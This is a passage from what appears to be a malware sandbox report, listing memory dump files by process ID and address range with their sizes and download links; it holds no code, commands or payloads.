128KB

Download
memory/964-93-0x0000000000000000-mapping.dmp

Download
memory/964-269-0x00000000069F0000-0x0000000006B45000-memory.dmp

Filesize
1.3MB

Download
memory/964-264-0x0000000000080000-0x00000000000A0000-memory.dmp

Filesize
128KB

Download
memory/964-249-0x0000000000080000-0x00000000000A0000-memory.dmp

Filesize
128KB

Download
memory/1020-92-0x0000000000000000-mapping.dmp

Download
memory/1052-98-0x0000000000000000-mapping.dmp

Download
memory/1076-136-0x0000000000000000-mapping.dmp

Download
memory/1096-122-0x0000000000000000-mapping.dmp

Download
memory/1128-111-0x0000000000000000-mapping.dmp

Download
memory/1160-113-0x0000000000000000-mapping.dmp

Download
memory/1176-72-0x0000000072E40000-0x00000000733EB000-memory.dmp

Filesize
5.7MB

Download
memory/1176-75-0x0000000072E40000-0x00000000733EB000-memory.dmp

Filesize
5.7MB

Download
memory/1176-116-0x0000000000000000-mapping.dmp

Download
memory/1176-68-0x0000000000000000-mapping.dmp

Download
memory/1200-120-0x0000000000000000-mapping.dmp

Download
memory/1212-124-0x0000000000000000-mapping.dmp

Download
memory/1308-103-0x0000000000000000-mapping.dmp

Download
memory/1356-109-0x0000000000000000-mapping.dmp

Download
memory/1432-110-0x0000000000000000-mapping.dmp

Download
memory/1464-114-0x0000000000400000-0x00000000004C0000-memory.dmp

Filesize
768KB

Download
memory/1464-55-0x0000000000400000-0x00000000004C0000-memory.dmp

Filesize
768KB

Download
memory/1464-54-0x0000000074B51000-0x0000000074B53000-memory.dmp

Filesize
8KB

Download
memory/1464-57-0x0000000000400000-0x00000000004C0000-memory.dmp

Filesize
768KB

Download
memory/1472-90-0x0000000000000000-mapping.dmp

Download
memory/1484-99-0x0000000000000000-mapping.dmp

Download
memory/1532-129-0x0000000000000000-mapping.dmp

Download
memory/1536-95-0x0000000000000000-mapping.dmp

Download
memory/1536-267-0x0000000000CE0000-0x0000000000DC0000-memory.dmp

Filesize
896KB

Download
memory/1556-272-0x0000000000C70000-0x0000000000DC5000-memory.dmp

Filesize
1.3MB

Download
memory/1556-270-0x0000000000C70000-0x0000000000DC5000-memory.dmp

Filesize
1.3MB

Download
memory/1556-140-0x0000000000000000-mapping.dmp

Download
memory/1572-134-0x0000000000000000-mapping.dmp

Download
memory/1588-88-0x0000000000000000-mapping.dmp

Download
memory/1596-100-0x0000000000000000-mapping.dmp

Download
memory/1680-84-0x0000000000000000-mapping.dmp

Download
memory/1684-127-0x0000000000000000-mapping.dmp

Download
memory/1704-135-0x0000000000000000-mapping.dmp

Download
memory/1732-105-0x0000000000000000-mapping.dmp

Download
memory/1736-108-0x0000000000000000-mapping.dmp

Download
memory/1744-102-0x0000000000000000-mapping.dmp

Download
memory/1752-112-0x0000000000000000-mapping.dmp

Download
memory/1756-106-0x0000000000000000-mapping.dmp

Download
memory/1764-107-0x0000000000000000-mapping.dmp

Download
memory/1776-101-0x0000000000000000-mapping.dmp

Download
memory/1792-130-0x0000000000000000-mapping.dmp

Download
memory/1824-73-0x0000000000000000-mapping.dmp

Download
memory/1824-271-0x00000000010B0000-0x00000000010D2000-memory.dmp

Filesize
136KB

Download
memory/1828-247-0x0000000000950000-0x00000000009B0000-memory.dmp

Filesize
384KB

Download
memory/1828-131-0x0000000000000000-mapping.dmp

Download
memory/1836-138-0x0000000000000000-mapping.dmp

Download
memory/1884-143-0x0000000000000000-mapping.dmp

Download
memory/1900-141-0x0000000000000000-mapping.dmp

Download
memory/1904-185-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-200-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-199-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-166-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-202-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-201-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-203-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-163-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-167-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-162-0x0000000006E60000-0x000000000717A000-memory.dmp

Filesize
3.1MB

Download
memory/1904-194-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-193-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-192-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-191-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-190-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-168-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-189-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-188-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-187-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-186-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-175-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-197-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-160-0x00000000003B0000-0x00000000003C6000-memory.dmp

Filesize
88KB

Download
memory/1904-184-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-169-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-170-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-195-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-198-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-183-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-196-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-182-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-181-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-180-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-171-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-165-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-179-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-172-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-178-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-177-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-173-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-174-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1904-176-0x0000000007180000-0x00000000072C0000-memory.dmp

Filesize
1.2MB

Download
memory/1912-133-0x0000000000000000-mapping.dmp

Download
memory/1928-119-0x0000000000000000-mapping.dmp

Download
memory/1932-117-0x0000000000000000-mapping.dmp

Download
memory/1936-80-0x0000000000000000-mapping.dmp

Download
memory/1936-147-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/1936-164-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/1948-118-0x0000000000000000-mapping.dmp

Download
memory/1952-132-0x0000000000000000-mapping.dmp

Download
memory/1972-115-0x0000000000000000-mapping.dmp

Download
memory/2000-64-0x0000000000000000-mapping.dmp

Download
memory/2032-65-0x0000000000000000-mapping.dmp

Download
memory/2036-137-0x0000000000000000-mapping.dmp

Download
memory/2040-59-0x0000000000000000-mapping.dmp

Download
memory/2040-63-0x0000000074141000-0x0000000074143000-memory.dmp

Filesize
8KB

Download